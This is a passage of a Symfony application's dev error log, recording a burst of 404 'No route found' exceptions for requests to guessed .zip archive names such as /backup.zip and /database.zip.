  3618. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /upload.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /upload.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3619. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /database.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /database.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3620. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-complete.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-complete.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3621. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3622. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3623. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /inetpub.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /inetpub.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3624. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_weekly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_weekly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3625. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3626. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3627. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /images.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /images.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3628. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /www.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /www.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3629. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apps.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apps.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3630. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /clients.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /clients.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3631. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3632. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public_html.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public_html.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3633. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rest.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rest.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3634. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /run.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /run.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3635. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /exceptions.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /exceptions.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3636. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /media.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /media.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3637. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /kernel.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /kernel.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3638. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /export.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /export.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3639. [2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /typo3.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /typo3.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3640. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /php.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /php.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3641. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /express.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /express.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3642. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telegram.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telegram.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3643. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /youtube.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /youtube.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3644. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ionic.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ionic.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3645. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /splunk.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /splunk.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3646. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /facebook.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /facebook.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3647. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sync.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sync.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3648. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /native.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /native.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3649. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /bugsnag.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /bugsnag.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3650. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mobile.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mobile.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3651. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /datadog.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /datadog.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3652. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mega.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mega.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3653. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /general.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /general.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3654. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /common.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /common.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3655. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /slack.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /slack.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3656. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /example.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /example.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3657. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /miscellaneous.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /miscellaneous.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3658. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /pinterest.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /pinterest.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3659. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /pcloud.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /pcloud.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3660. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /xamarin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /xamarin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
